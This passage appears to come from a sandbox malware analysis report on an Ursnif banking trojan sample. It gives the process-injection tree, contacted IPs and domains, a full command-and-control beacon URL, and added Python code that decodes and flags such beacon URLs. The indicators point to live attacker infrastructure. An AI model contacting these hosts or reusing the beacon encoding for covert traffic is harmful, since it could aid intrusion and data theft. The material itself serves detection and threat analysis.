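    hit = region_for_address(YARA_HITS, 1, 0x00E55F90)  # 1_2_00E55F90 CreateNamedPipeA
    print(f"regsvr32's CreateNamedPipeA routine most likely sits in dump {hit.base:#x}")
```

Run stand-alone it reports a single executable hit: the final dump of regsvr32.exe at 0x00E50000, the same region that holds the CreateNamedPipeA routine listed above as 1_2_00E55F90. The eight runtime dumps of the read/write region at 0x05318000 in that process are a staging buffer the loader kept rewriting, which is why they all match the rule without being executable. Because the report gives base addresses but not sizes, region_for_address only names the nearest candidate dump; confirm the containment in the dump itself before relying on it.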

Remote Access Functionality:

Yara detected Ursnif
Source: the same Yara matches listed under Stealing of Sensitive Information above (twenty memory dumps plus the process memory of RuntimeBroker.exe PIDs 4288 and 4016, powershell.exe PID 5236, regsvr32.exe PID 4616 and control.exe PID 6684).
Behavior Graph (ID: 353290, Sample: SecuriteInfo.com.Generic.mg..., Startdate: 16/02/2021, Architecture: WINDOWS, Score: 100)

Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 9 other signatures

Process tree (child processes indented; "injected" marks a process the parent injected into rather than started):

loaddll32.exe
    regsvr32.exe
        signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Modifies the context of a thread in another process (thread injection); 2 other signatures
        control.exe
            signatures: Changes memory attributes in foreign processes to executable or writable; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 4 other signatures
            explorer.exe (injected)
                signatures: Changes memory attributes in foreign processes to executable or writable; Writes to foreign memory regions; Allocates memory in foreign processes; 4 other signatures
                DNS/IP: c56.lepini.at
                RuntimeBroker.exe (injected)
                RuntimeBroker.exe (injected)
    cmd.exe
        iexplore.exe
            iexplore.exe
                DNS/IP: img.img-taboola.com; tls13.taboola.map.fastly.net 151.101.1.44, 443, 49742, 49743 FASTLYUS United States; 9 other IPs or domains
            iexplore.exe
                DNS/IP: api10.laptok.at 34.65.144.159, 49759, 49760, 49761 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States
            iexplore.exe
            iexplore.exe
mshta.exe
    signatures: Suspicious powershell command line found
    powershell.exe
        signatures: Injects code into the Windows Explorer (explorer.exe); Maps a DLL or memory area into another process; Compiles code for process injection (via .Net compiler); Creates a thread in another existing process (thread injection)
        dropped: C:\Users\user\AppData\...\jnnfehtw.cmdline (UTF-8); C:\Users\user\AppData\Local\...\idzehqcm.0.cs (UTF-8)
        csc.exe
            dropped: C:\Users\user\AppData\Local\...\jnnfehtw.dll (PE32)
            cvtres.exe
        csc.exe
            dropped: C:\Users\user\AppData\Local\...\idzehqcm.dll (PE32)
            cvtres.exe
        conhost.exe

Contacted Public IPs

IP             Domain   Country        ASN     ASN Name                               Malicious
34.65.144.159  unknown  United States  139070  GOOGLE-AS-APGoogleAsiaPacificPteLtdSG  false
104.20.185.68  unknown  United States  13335   CLOUDFLARENETUS                        false
151.101.1.44   unknown  United States  54113   FASTLYUS                               false

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
contextual.media.net 184.30.24.22 true
tls13.taboola.map.fastly.net 151.101.1.44 true
hblg.media.net 184.30.24.22 true
c56.lepini.at 34.65.144.159 true
lg3.media.net 184.30.24.22 true
geolocation.onetrust.com 104.20.185.68 true
api10.laptok.at 34.65.144.159 true
web.vortex.data.msn.com unknown unknown
www.msn.com unknown unknown
srtb.msn.com unknown unknown
img.img-taboola.com unknown unknown
cvision.media.net unknown unknown

Contacted URLs

Name: http://api10.laptok.at/api1/mOmUNrUT1Tkf_/2Fpjx5UP/NjKT2TUVc9KVEb1kN7jSv_2/Bku6FvO8M8/iUmLw2_2FTDrkr5tf/cCMI7qZIJsl5/daUh7ottHLc/7HVIrVoY1SieQv/lhrGpaJPPzKF03EAwxNqA/D874ye_2FRUsy2K6/xciFCEzbH51FFw_/2Bb8QoHf6NpN75pZ5G/Mu_2BbqUp/c75ragbUEKlE0l1LX_2F/4u83BFS0FCNHpZrX6b9/sd4d4jezfNsCefQ_2B6iCK/p1XgqNgeBsVt9/izg8Zsvz/1FaNRSjvruwthZY1A7QfFWz/_2BhfXLKTN/ZLkri3_2BI/e8SUozS
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown
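The one URL in this table carries its request data in the path. The script below is an added example, not part of the report: it reverses the encoding that produces such paths. The rule it applies (base64 with '/' rewritten as _2F and '+' as _2B, then '/' characters inserted at arbitrary positions so the path splits into short random-looking segments) comes from public Ursnif/ISFB analyses and is not stated on this page; treating the first segment, api1, as a fixed prefix is an assumption, and the benign comparison URLs are constructed. The recovered bytes are still encrypted and are not decrypted here.

```python
"""Recover the payload behind the beacon URL in this report's 'Contacted URLs' table.

Added example, not part of the Joe Sandbox report. The encoding it reverses
(base64 with '/' rewritten as '_2F' and '+' as '_2B', then '/' inserted at
arbitrary positions to split the path into short segments) is the Ursnif/ISFB
request format described in public analyses; this page only shows the result.
Treating the first path segment ('api1') as a fixed prefix is an assumption.
"""
import base64
import binascii
from typing import Optional
from urllib.parse import urlsplit

# The URL from this report's 'Contacted URLs' table, split over lines unchanged.
REPORT_URL = (
    "http://api10.laptok.at/api1/mOmUNrUT1Tkf_/2Fpjx5UP/NjKT2TUVc9KVEb1kN7jSv_2/Bku6FvO8M8/"
    "iUmLw2_2FTDrkr5tf/cCMI7qZIJsl5/daUh7ottHLc/7HVIrVoY1SieQv/lhrGpaJPPzKF03EAwxNqA/"
    "D874ye_2FRUsy2K6/xciFCEzbH51FFw_/2Bb8QoHf6NpN75pZ5G/Mu_2BbqUp/c75ragbUEKlE0l1LX_2F/"
    "4u83BFS0FCNHpZrX6b9/sd4d4jezfNsCefQ_2B6iCK/p1XgqNgeBsVt9/izg8Zsvz/"
    "1FaNRSjvruwthZY1A7QfFWz/_2BhfXLKTN/ZLkri3_2BI/e8SUozS"
)
# Constructed benign comparison URLs (not from the report).
BENIGN_URLS = [
    "https://www.msn.com/en-us/news/world/some-article",
    "https://cdn.example.test/static/YWJj",  # short plain base64, no splitting
]


def path_segments(url: str) -> list:
    return [s for s in urlsplit(url).path.split("/") if s]


def recover_blob(url: str) -> Optional[bytes]:
    """Undo the segment splitting and the _2F/_2B substitution and return the
    raw (still encrypted) request body, or None if the path is not base64."""
    segments = path_segments(url)
    if len(segments) < 2:
        return None
    joined = "".join(segments[1:])  # drop the fixed 'api1'-style prefix
    b64 = joined.replace("_2F", "/").replace("_2B", "+")
    b64 += "=" * (-len(b64) % 4)   # padding is absent in the URL; restore it
    try:
        return base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None


def looks_like_isfb_beacon(url: str, min_payload: int = 48) -> bool:
    """Heuristic: many short path segments, escaped base64 characters, and a
    payload long enough to be an encrypted check-in rather than a static asset."""
    segments = path_segments(url)
    blob = recover_blob(url)
    if blob is None or len(blob) < min_payload:
        return False
    joined = "".join(segments)
    return len(segments) >= 4 and ("_2F" in joined or "_2B" in joined)


if __name__ == "__main__":
    blob = recover_blob(REPORT_URL)
    print(f"report URL: {len(path_segments(REPORT_URL))} segments, "
          f"{len(blob)} payload bytes, beacon={looks_like_isfb_beacon(REPORT_URL)}")
    for u in BENIGN_URLS:
        print(f"{u}: beacon={looks_like_isfb_beacon(u)}")
```

The report URL has 23 path segments that rejoin into 299 base64 characters, a 224-byte payload, and is flagged; the constructed benign URLs are not. The heuristic in looks_like_isfb_beacon is for triage, not blocking: a legitimate CDN path can be valid base64 too, so the escaped-character and segment-count conditions do the discriminating, and the Avira "safe" verdict on this very URL shows why a structural check is worth running alongside reputation lookups.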